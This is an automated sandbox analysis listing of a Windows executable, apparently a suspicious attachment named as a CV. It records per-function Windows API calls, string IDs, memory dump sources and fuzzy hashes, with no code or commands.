                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 003CAB46
                                                                                        • VariantClear.OLEAUT32(?), ref: 003CAB52
                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 003CAC40
                                                                                        • __swprintf.LIBCMT ref: 003CAC70
                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 003CAC9C
                                                                                        • VariantInit.OLEAUT32(?), ref: 003CAD4D
                                                                                        • SysFreeString.OLEAUT32(00000016), ref: 003CADDF
                                                                                        • VariantClear.OLEAUT32(?), ref: 003CAE35
                                                                                        • VariantClear.OLEAUT32(?), ref: 003CAE44
                                                                                        • VariantInit.OLEAUT32(00000000), ref: 003CAE80
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                        • API String ID: 3730832054-3931177956
                                                                                        • Opcode ID: 233bbf7e72d7485e3631ca90c9e9311235b84edb3fc53fb69226b2f988e963d8
                                                                                        • Instruction ID: 07e67e41a652bc7f4443b8a5fe2c241e22efd82c8da8c6c311ae18639cc2243e
                                                                                        • Opcode Fuzzy Hash: 233bbf7e72d7485e3631ca90c9e9311235b84edb3fc53fb69226b2f988e963d8
                                                                                        • Instruction Fuzzy Hash: CAD1FF71A00A19DBCF16AF65C884F6AB7B9BF04704F15806DE405EB580DB34EC40DBA2
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 003E71FC
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003E7247
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                        • API String ID: 3974292440-4258414348
                                                                                        • Opcode ID: 6e8a961eac16ad285aed6794591b87bbcda57fb1b5f99705e4ef8a73e0eb79ef
                                                                                        • Instruction ID: 121705043d7b3711268a165047d1b58a46d05551fb29c88ccb5a2c6ec14a38d6
                                                                                        • Opcode Fuzzy Hash: 6e8a961eac16ad285aed6794591b87bbcda57fb1b5f99705e4ef8a73e0eb79ef
                                                                                        • Instruction Fuzzy Hash: FC919F342047519BCB16FF21C851AAEB7A5BF84304F044999F9966B7E2DB30ED0ADB81
                                                                                        APIs
                                                                                        • EnumChildWindows.USER32(?,003BCF50), ref: 003BCE90
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChildEnumWindows
                                                                                        • String ID: 4+C$CLASS$CLASSNN$H+C$INSTANCE$L+C$NAME$P+C$REGEXPCLASS$T+C$TEXT
                                                                                        • API String ID: 3555792229-4208749292
                                                                                        • Opcode ID: a27f601f53935fc7551014b3a4f51040a70fad76b847a8bd89557f077e40e722
                                                                                        • Instruction ID: 19031b7551f364f7cab0b04da9044d82b1720450003ae603f6450da3adc9bcef
                                                                                        • Opcode Fuzzy Hash: a27f601f53935fc7551014b3a4f51040a70fad76b847a8bd89557f077e40e722
                                                                                        • Instruction Fuzzy Hash: D4919530A10606DBCB2AEF60C482BEAFB75FF04304F509559DA59AB651DF30B959CBD0
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003EE5AB
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,003E9808,?), ref: 003EE607
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003EE647
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003EE68C
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003EE6C3
                                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,003E9808,?), ref: 003EE6CF
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003EE6DF
                                                                                        • DestroyIcon.USER32(?), ref: 003EE6EE
                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003EE70B
                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003EE717
                                                                                          • Part of subcall function 003A0FA7: __wcsicmp_l.LIBCMT ref: 003A1030
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                        • String ID: .dll$.exe$.icl
                                                                                        • API String ID: 1212759294-1154884017
                                                                                        • Opcode ID: 92377dcedf7cb9136f9d99e674457ff8ed2e04d8bb4d0400780f4d567a592f53
                                                                                        • Instruction ID: f41993837c03f3a9bcfa994eaa3e1418fa8949d2ab9a0a1c0e3fc713c9042315
                                                                                        • Opcode Fuzzy Hash: 92377dcedf7cb9136f9d99e674457ff8ed2e04d8bb4d0400780f4d567a592f53
                                                                                        • Instruction Fuzzy Hash: 8561E171900265FAEB26DF65CC46FBE77A8BB08724F104215F911EA1D1EB74E980CB64
                                                                                        APIs
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 003CD292
                                                                                        • GetDriveTypeW.KERNEL32 ref: 003CD2DF
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CD327
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CD35E
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CD38C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                        • API String ID: 1148790751-4113822522
                                                                                        • Opcode ID: 0f144b4440fec817045cfbddefedfda35b5f665a76d1161b0ab929cdd57e2862
                                                                                        • Instruction ID: 157e8f063978cf5826511136f2eb958092bd06f86b939a177d4129abfb4effb5
                                                                                        • Opcode Fuzzy Hash: 0f144b4440fec817045cfbddefedfda35b5f665a76d1161b0ab929cdd57e2862
                                                                                        • Instruction Fuzzy Hash: 3A513B75504705AFC702FF20C98196AB7E4FF98718F10886DF885AB261DB35EE09CB52
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,003F3973,00000016,0000138C,00000016,?,00000016,0041DDB4,00000000,?), ref: 003C26F1
                                                                                        • LoadStringW.USER32(00000000,?,003F3973,00000016), ref: 003C26FA
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,003F3973,00000016,0000138C,00000016,?,00000016,0041DDB4,00000000,?,00000016), ref: 003C271C
                                                                                        • LoadStringW.USER32(00000000,?,003F3973,00000016), ref: 003C271F
                                                                                        • __swprintf.LIBCMT ref: 003C276F
                                                                                        • __swprintf.LIBCMT ref: 003C2780
                                                                                        • _wprintf.LIBCMT ref: 003C2829
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003C2840
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                        • API String ID: 618562835-2268648507
                                                                                        • Opcode ID: 675f737c5e6b10f2192409b5b0f2247dad070abb57447441b454f6748a0583d8
                                                                                        • Instruction ID: 3b3950ff7f78aecd5b22ac6550de6cf2823d1ab28798102d66ea6c230af29a34
                                                                                        • Opcode Fuzzy Hash: 675f737c5e6b10f2192409b5b0f2247dad070abb57447441b454f6748a0583d8
                                                                                        • Instruction Fuzzy Hash: D2413372800719BACF16FBE0DD86EEFB778AF55345F1000A5B501BA092EA756F49CB60
                                                                                        APIs
                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003CD0D8
                                                                                        • __swprintf.LIBCMT ref: 003CD0FA
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 003CD137
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003CD15C
                                                                                        • _memset.LIBCMT ref: 003CD17B
                                                                                        • _wcsncpy.LIBCMT ref: 003CD1B7
                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003CD1EC
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003CD1F7
                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 003CD200
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003CD20A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                        • String ID: :$\$\??\%s
                                                                                        • API String ID: 2733774712-3457252023
                                                                                        • Opcode ID: 34471110eaa6d4e73a77bdc93df035bd82c46267b69f509ada3014e5a309cb2b
                                                                                        • Instruction ID: 0b89ba45539449d2ff40e7bbf2e09b2e3a31fe50eea8f3bb6035dfc5f4bf556a
                                                                                        • Opcode Fuzzy Hash: 34471110eaa6d4e73a77bdc93df035bd82c46267b69f509ada3014e5a309cb2b
                                                                                        • Instruction Fuzzy Hash: BA31A4B6900109ABDB22DFA4DC49FEB77BCEF89740F1041BAF509E6161E770DA458B24
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                        • String ID:
                                                                                        • API String ID: 884005220-0
                                                                                        • Opcode ID: 38bcb4936f5a99dd04f58cb7721b18a3e85f8c1cc3ecb4b1d17d4306930a6253
                                                                                        • Instruction ID: 808ddbf3894a1e94a6eeff4c00e43ebf51b03407669398ba0dffe103dd6a0ee5
                                                                                        • Opcode Fuzzy Hash: 38bcb4936f5a99dd04f58cb7721b18a3e85f8c1cc3ecb4b1d17d4306930a6253
                                                                                        • Instruction Fuzzy Hash: 4361E032900215EFDB236F64DC42BFA77ACEF02329F21012AEA01EA991DF35D941C795
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 003EE754
                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 003EE76B
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 003EE776
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003EE783
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 003EE78C
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003EE79B
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 003EE7A4
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003EE7AB
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 003EE7BC
                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,0040D9BC,?), ref: 003EE7D5
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 003EE7E5
                                                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 003EE809
                                                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 003EE834
                                                                                        • DeleteObject.GDI32(00000000), ref: 003EE85C
                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003EE872
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 3840717409-0
                                                                                        • Opcode ID: 88f85f14edc695692532c92cc368a49e55e502209fa2a1befa81005e24e55f8f
                                                                                        • Instruction ID: e659077b3d6904f11b159fde242a28f760b3cbea4d92cb6afa97920857b599e9
                                                                                        • Opcode Fuzzy Hash: 88f85f14edc695692532c92cc368a49e55e502209fa2a1befa81005e24e55f8f
                                                                                        • Instruction Fuzzy Hash: EE415E75900219FFDB119FA5CD48EAA7BB8FF89B15F108168F906E72A0D7309D44DB20
                                                                                        APIs
                                                                                        • __wsplitpath.LIBCMT ref: 003D076F
                                                                                        • _wcscat.LIBCMT ref: 003D0787
                                                                                        • _wcscat.LIBCMT ref: 003D0799
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003D07AE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003D07C2
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 003D07DA
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 003D07F4
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003D0806
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                        • String ID: *.*
                                                                                        • API String ID: 34673085-438819550
                                                                                        • Opcode ID: 88314572974160acb3451678ac0856fe134d6156cec90c300bcfe2cf38855f9a
                                                                                        • Instruction ID: bf38d8958b7bf64e996c4573ac6e44039fa9199075a6479b6cc3ec7c96881c55
                                                                                        • Opcode Fuzzy Hash: 88314572974160acb3451678ac0856fe134d6156cec90c300bcfe2cf38855f9a
                                                                                        • Instruction Fuzzy Hash: 8C8180725043019FCB2AEF64D845A6EB7E8FBC8714F15882FF885DB351E630D9548B92
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003EEF3B
                                                                                        • GetFocus.USER32 ref: 003EEF4B
                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 003EEF56
                                                                                        • _memset.LIBCMT ref: 003EF081
                                                                                        • GetMenuItemInfoW.USER32 ref: 003EF0AC
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 003EF0CC
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 003EF0DF
                                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 003EF113
                                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 003EF15B
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003EF193
                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003EF1C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1296962147-4108050209
                                                                                        • Opcode ID: 695011f946f180b64898f85a55f0bd0077f324bd6e10862f6597ebd80657bc2a
                                                                                        • Instruction ID: 03cc9be6605ffc05a6b4f11a9147a51f79b4950bb105fcc159050ec734b63756
                                                                                        • Opcode Fuzzy Hash: 695011f946f180b64898f85a55f0bd0077f324bd6e10862f6597ebd80657bc2a
                                                                                        • Instruction Fuzzy Hash: 3781AD716083A5EFDB12CF16C884A6BBBE8FF88314F01462EF99997291D770D805CB52
                                                                                        APIs
                                                                                          • Part of subcall function 003BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003BABD7
                                                                                          • Part of subcall function 003BABBB: GetLastError.KERNEL32(?,003BA69F,?,?,?), ref: 003BABE1
                                                                                          • Part of subcall function 003BABBB: GetProcessHeap.KERNEL32(00000008,?,?,003BA69F,?,?,?), ref: 003BABF0
                                                                                          • Part of subcall function 003BABBB: HeapAlloc.KERNEL32(00000000,?,003BA69F,?,?,?), ref: 003BABF7
                                                                                          • Part of subcall function 003BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003BAC0E
                                                                                          • Part of subcall function 003BAC56: GetProcessHeap.KERNEL32(00000008,003BA6B5,00000000,00000000,?,003BA6B5,?), ref: 003BAC62
                                                                                          • Part of subcall function 003BAC56: HeapAlloc.KERNEL32(00000000,?,003BA6B5,?), ref: 003BAC69
                                                                                          • Part of subcall function 003BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003BA6B5,?), ref: 003BAC7A
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003BA8CB
                                                                                        • _memset.LIBCMT ref: 003BA8E0
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003BA8FF
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 003BA910
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 003BA94D
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003BA969
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 003BA986
                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003BA995
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 003BA99C
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003BA9BD
                                                                                        • CopySid.ADVAPI32(00000000), ref: 003BA9C4
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003BA9F5
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003BAA1B
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003BAA2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3996160137-0
                                                                                        • Opcode ID: 4d30d777ad107f69dc56c81953b2466dec20232df964680111eb39ab68eee637
                                                                                        • Instruction ID: 11ed8e8a0bea9dd742d462d183f694733c8fc40097ef3356345b7a0acb04a542
                                                                                        • Opcode Fuzzy Hash: 4d30d777ad107f69dc56c81953b2466dec20232df964680111eb39ab68eee637
                                                                                        • Instruction Fuzzy Hash: 22516D71900A09AFDF15DFA0DD45EEEBBB9FF04308F048129FA15AB690DB359A05CB61
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString__swprintf_wprintf
                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                        • API String ID: 2889450990-2391861430
